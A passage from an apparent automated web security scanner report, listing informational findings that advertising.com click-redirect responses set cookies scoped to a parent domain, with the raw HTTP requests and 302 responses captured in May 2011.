Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 3024464342=_4dc1f637,3024464342,743227^894905^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.87. http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
0642027268=_4dc1f63b,0642027268,800563^894873^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 0642027268=_4dc1f63b,0642027268,800563^894873^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.88. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
5365043223=_4dc1f67d,5365043223,804145^894875^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 5365043223=_4dc1f67d,5365043223,804145^894875^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.89. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
1346633562=_4dc1f67d,1346633562,804145^956559^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
